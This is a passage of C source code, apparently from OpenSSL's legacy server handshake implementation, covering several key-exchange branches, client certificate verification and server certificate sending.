s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,p,i);
OPENSSL_cleanse(p,i);
if (dh_clnt)
return 2;
}
else
#endif
#ifndef OPENSSL_NO_KRB5
if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
krb5_data enc_ticket;
krb5_data authenticator;
krb5_data enc_pms;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char pms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_BLOCK_LENGTH];
int padl, outl;
krb5_timestamp authtime = 0;
krb5_ticket_times ttimes;
EVP_CIPHER_CTX_init(&ciph_ctx);
if (!kssl_ctx) kssl_ctx = kssl_ctx_new();
n2s(p,i);
enc_ticket.length = i;
if (n < (long)(enc_ticket.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
enc_ticket.data = (char *)p;
p+=enc_ticket.length;
n2s(p,i);
authenticator.length = i;
if (n < (long)(enc_ticket.length + authenticator.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
authenticator.data = (char *)p;
p+=authenticator.length;
n2s(p,i);
enc_pms.length = i;
enc_pms.data = (char *)p;
p+=enc_pms.length;
/* Note that the length is checked again below,
** after decryption
*/
if(enc_pms.length > sizeof pms)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (n != (long)(enc_ticket.length + authenticator.length +
enc_pms.length + 6))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if ((krb5rc = kssl_sget_tkt(kssl_ctx, &enc_ticket, &ttimes,
&kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_sget_tkt rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/* Note: no authenticator is not considered an error,
** but will return authtime == 0.
*/
if ((krb5rc = kssl_check_authent(kssl_ctx, &authenticator,
&authtime, &kssl_err)) != 0)
{
#ifdef KSSL_DEBUG
fprintf(stderr,"kssl_check_authent rtn %d [%d]\n",
krb5rc, kssl_err.reason);
if (kssl_err.text)
fprintf(stderr,"kssl_err text= %s\n", kssl_err.text);
#endif /* KSSL_DEBUG */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
if ((krb5rc = kssl_validate_times(authtime, &ttimes)) != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE, krb5rc);
goto err;
}
#ifdef KSSL_DEBUG
kssl_ctx_show(kssl_ctx);
#endif /* KSSL_DEBUG */
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
memset(iv, 0, sizeof iv); /* per RFC 1510 */
if (!EVP_DecryptInit_ex(&ciph_ctx,enc,NULL,kssl_ctx->key,iv))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (!EVP_DecryptUpdate(&ciph_ctx, pms,&outl,
(unsigned char *)enc_pms.data, enc_pms.length))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!EVP_DecryptFinal_ex(&ciph_ctx,&(pms[outl]),&padl))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DECRYPTION_FAILED);
goto err;
}
outl += padl;
if (outl > SSL_MAX_MASTER_KEY_LENGTH)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
if (!((pms[0] == (s->client_version>>8)) && (pms[1] == (s->client_version & 0xff))))
{
/* The premaster secret must contain the same version number as the
* ClientHello to detect version rollback attacks (strangely, the
* protocol does not offer such protection for DH ciphersuites).
* However, buggy clients exist that send random bytes instead of
* the protocol version.
* If SSL_OP_TLS_ROLLBACK_BUG is set, tolerate such clients.
* (Perhaps we should have a separate BUG value for the Kerberos cipher)
*/
if (!(s->options & SSL_OP_TLS_ROLLBACK_BUG))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_AD_DECODE_ERROR);
goto err;
}
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, pms, outl);
if (kssl_ctx->client_princ)
{
size_t len = strlen(kssl_ctx->client_princ);
if ( len < SSL_MAX_KRB5_PRINCIPAL_LENGTH )
{
s->session->krb5_client_princ_len = len;
memcpy(s->session->krb5_client_princ,kssl_ctx->client_princ,len);
}
}
/*- Was doing kssl_ctx_free() here,
* but it caused problems for apache.
* kssl_ctx = kssl_ctx_free(kssl_ctx);
* if (s->kssl_ctx) s->kssl_ctx = NULL;
*/
}
else
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
if (alg_k & (SSL_kECDHE|SSL_kECDHr|SSL_kECDHe))
{
int ret = 1;
int field_size = 0;
const EC_KEY *tkey;
const EC_GROUP *group;
const BIGNUM *priv_key;
/* initialize structures for server's ECDH key pair */
if ((srvr_ecdh = EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Let's get server private key and group information */
if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
/* use the certificate */
tkey = s->cert->pkeys[SSL_PKEY_ECC].privatekey->pkey.ec;
}
else
{
/* use the ephermeral values we saved when
* generating the ServerKeyExchange msg.
*/
tkey = s->s3->tmp.ecdh;
}
group = EC_KEY_get0_group(tkey);
priv_key = EC_KEY_get0_private_key(tkey);
if (!EC_KEY_set_group(srvr_ecdh, group) ||
!EC_KEY_set_private_key(srvr_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* Let's get client's public key */
if ((clnt_ecpoint = EC_POINT_new(group)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if (n == 0L)
{
/* Client Publickey was in Client Certificate */
if (alg_k & SSL_kECDHE)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (((clnt_pub_pkey=X509_get_pubkey(s->session->peer))
== NULL) ||
(clnt_pub_pkey->type != EVP_PKEY_EC))
{
/* XXX: For now, we do not support client
* authentication using ECDH certificates
* so this branch (n == 0L) of the code is
* never executed. When that support is
* added, we ought to ensure the key
* received in the certificate is
* authorized for key agreement.
* ECDH_compute_key implicitly checks that
* the two ECDH shares are for the same
* group.
*/
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNABLE_TO_DECODE_ECDH_CERTS);
goto f_err;
}
if (EC_POINT_copy(clnt_ecpoint,
EC_KEY_get0_public_key(clnt_pub_pkey->pkey.ec)) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
ret = 2; /* Skip certificate verify processing */
}
else
{
/* Get client's public key from encoded point
* in the ClientKeyExchange message.
*/
if ((bn_ctx = BN_CTX_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
/* Get encoded point length */
i = *p;
p += 1;
if (n != 1 + i)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
if (EC_POINT_oct2point(group,
clnt_ecpoint, p, i, bn_ctx) == 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_EC_LIB);
goto err;
}
/* p is pointing to somewhere in the buffer
* currently, so set it to the start
*/
p=(unsigned char *)s->init_buf->data;
}
/* Compute the shared pre-master secret */
field_size = EC_GROUP_get_degree(group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
i = ECDH_compute_key(p, (field_size+7)/8, clnt_ecpoint, srvr_ecdh, NULL);
if (i <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
EC_KEY_free(s->s3->tmp.ecdh);
s->s3->tmp.ecdh = NULL;
/* Compute the master secret */
s->session->master_key_length = s->method->ssl3_enc-> \
generate_master_secret(s, s->session->master_key, p, i);
OPENSSL_cleanse(p, i);
return (ret);
}
else
#endif
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
char tmp_id[PSK_MAX_IDENTITY_LEN+1];
al=SSL_AD_HANDSHAKE_FAILURE;
n2s(p,i);
if (n != i+2)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_LENGTH_MISMATCH);
goto psk_err;
}
if (i > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto psk_err;
}
if (s->psk_server_callback == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_SERVER_CB);
goto psk_err;
}
/* Create guaranteed NULL-terminated identity
* string for the callback */
memcpy(tmp_id, p, i);
memset(tmp_id+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
psk_len = s->psk_server_callback(s, tmp_id,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
OPENSSL_cleanse(tmp_id, PSK_MAX_IDENTITY_LEN+1);
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
/* PSK related to the given identity not found */
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
al=SSL_AD_UNKNOWN_PSK_IDENTITY;
goto psk_err;
}
/* create PSK pre_master_secret */
pre_ms_len=2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup((char *)p);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key, psk_or_pre_ms, pre_ms_len);
psk_err = 0;
psk_err:
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
goto f_err;
}
else
#endif
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
int param_len;
n2s(p,i);
param_len=i+2;
if (param_len > n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_A_LENGTH);
goto f_err;
}
if (!(s->srp_ctx.A=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
if (BN_ucmp(s->srp_ctx.A, s->srp_ctx.N) >= 0
|| BN_is_zero(s->srp_ctx.A))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_server_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
p+=i;
}
else
#endif /* OPENSSL_NO_SRP */
if (alg_k & SSL_kGOST)
{
int ret = 0;
EVP_PKEY_CTX *pkey_ctx;
EVP_PKEY *client_pub_pkey = NULL, *pk = NULL;
unsigned char premaster_secret[32], *start;
size_t outlen=32, inlen;
unsigned long alg_a;
int Ttag, Tclass;
long Tlen;
/* Get our certificate private key*/
alg_a = s->s3->tmp.new_cipher->algorithm_auth;
if (alg_a & SSL_aGOST94)
pk = s->cert->pkeys[SSL_PKEY_GOST94].privatekey;
else if (alg_a & SSL_aGOST01)
pk = s->cert->pkeys[SSL_PKEY_GOST01].privatekey;
pkey_ctx = EVP_PKEY_CTX_new(pk,NULL);
EVP_PKEY_decrypt_init(pkey_ctx);
/* If client certificate is present and is of the same type, maybe
* use it for key exchange. Don't mind errors from
* EVP_PKEY_derive_set_peer, because it is completely valid to use
* a client certificate for authorization only. */
client_pub_pkey = X509_get_pubkey(s->session->peer);
if (client_pub_pkey)
{
if (EVP_PKEY_derive_set_peer(pkey_ctx, client_pub_pkey) <= 0)
ERR_clear_error();
}
/* Decrypt session key */
if (ASN1_get_object((const unsigned char **)&p, &Tlen, &Ttag, &Tclass, n) != V_ASN1_CONSTRUCTED ||
Ttag != V_ASN1_SEQUENCE ||
Tclass != V_ASN1_UNIVERSAL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
start = p;
inlen = Tlen;
if (EVP_PKEY_decrypt(pkey_ctx,premaster_secret,&outlen,start,inlen) <=0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,SSL_R_DECRYPTION_FAILED);
goto gerr;
}
/* Generate master secret */
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
ret = 2;
else
ret = 1;
gerr:
EVP_PKEY_free(client_pub_pkey);
EVP_PKEY_CTX_free(pkey_ctx);
if (ret)
return ret;
else
goto err;
}
else
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE,
SSL_R_UNKNOWN_CIPHER_TYPE);
goto f_err;
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
#if !defined(OPENSSL_NO_DH) || !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_ECDH) || defined(OPENSSL_NO_SRP)
err:
#endif
#ifndef OPENSSL_NO_ECDH
EVP_PKEY_free(clnt_pub_pkey);
EC_POINT_free(clnt_ecpoint);
if (srvr_ecdh != NULL)
EC_KEY_free(srvr_ecdh);
BN_CTX_free(bn_ctx);
#endif
return(-1);
}
int ssl3_get_cert_verify(SSL *s)
{
EVP_PKEY *pkey=NULL;
unsigned char *p;
int al,ok,ret=0;
long n;
int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If key is GOST and n is exactly 64, it is bare
* signature without length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d",i);
}
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
int ssl3_get_client_certificate(SSL *s)
{
int i,ok,al,ret= -1;
X509 *x=NULL;
unsigned long l,nc,llen,n;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509) *sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_A,
SSL3_ST_SR_CERT_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
if (s->s3->tmp.message_type == SSL3_MT_CLIENT_KEY_EXCHANGE)
{
if ( (s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* If tls asked for a client cert, the client must return a 0 list */
if ((s->version > SSL3_VERSION) && s->s3->tmp.cert_request)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_TLS_PEER_DID_NOT_RESPOND_WITH_CERTIFICATE_LIST);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
s->s3->tmp.reuse_message=1;
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_WRONG_MESSAGE_TYPE);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
if ((sk=sk_X509_new_null()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
n2l3(p,llen);
if (llen+3 != n)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
for (nc=0; nc<llen; )
{
n2l3(p,l);
if ((l+nc+3) > llen)
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
q=p;
x=d2i_X509(NULL,&p,l);
if (x == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_ASN1_LIB);
goto err;
}
if (p != (q+l))
{
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERT_LENGTH_MISMATCH);
goto f_err;
}
if (!sk_X509_push(sk,x))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,ERR_R_MALLOC_FAILURE);
goto err;
}
x=NULL;
nc+=l+3;
}
if (sk_X509_num(sk) <= 0)
{
/* TLS does not mind 0 certs returned */
if (s->version == SSL3_VERSION)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_NO_CERTIFICATES_RETURNED);
goto f_err;
}
/* Fail for TLS only if we required a certificate */
else if ((s->verify_mode & SSL_VERIFY_PEER) &&
(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
al=SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
/* No client certificate so digest cached records */
if (s->s3->handshake_buffer && !ssl3_digest_cached_records(s))
{
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
}
else
{
EVP_PKEY *pkey;
i=ssl_verify_cert_chain(s,sk);
if (i <= 0)
{
al=ssl_verify_alarm_type(s->verify_result);
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,SSL_R_CERTIFICATE_VERIFY_FAILED);
goto f_err;
}
if (i > 1)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, i);
al = SSL_AD_HANDSHAKE_FAILURE;
goto f_err;
}
pkey = X509_get_pubkey(sk_X509_value(sk, 0));
if (pkey == NULL)
{
al=SSL3_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
SSL_R_UNKNOWN_CERTIFICATE_TYPE);
goto f_err;
}
EVP_PKEY_free(pkey);
}
if (s->session->peer != NULL) /* This should not be needed */
X509_free(s->session->peer);
s->session->peer=sk_X509_shift(sk);
s->session->verify_result = s->verify_result;
/* With the current implementation, sess_cert will always be NULL
* when we arrive here. */
if (s->session->sess_cert == NULL)
{
s->session->sess_cert = ssl_sess_cert_new();
if (s->session->sess_cert == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
goto err;
}
}
if (s->session->sess_cert->cert_chain != NULL)
sk_X509_pop_free(s->session->sess_cert->cert_chain, X509_free);
s->session->sess_cert->cert_chain=sk;
/* Inconsistency alert: cert_chain does *not* include the
* peer's own certificate, while we do include it in s3_clnt.c */
sk=NULL;
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (x != NULL) X509_free(x);
if (sk != NULL) sk_X509_pop_free(sk,X509_free);
return(ret);
}
int ssl3_send_server_certificate(SSL *s)
{
CERT_PKEY *cpk;
if (s->state == SSL3_ST_SW_CERT_A)
{
cpk=ssl_get_server_send_pkey(s);
if (cpk == NULL)
{
/* VRS: allow null cert if auth == KRB5 */
if ((s->s3->tmp.new_cipher->algorithm_auth != SSL_aKRB5) ||
(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
}
if (!ssl3_output_cert_chain(s,cpk))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,ERR_R_INTERNAL_ERROR);
return(0);
}
s->state=SSL3_ST_SW_CERT_B;
}
/* SSL3_ST_SW_CERT_B */
return ssl_do_write(s);
}
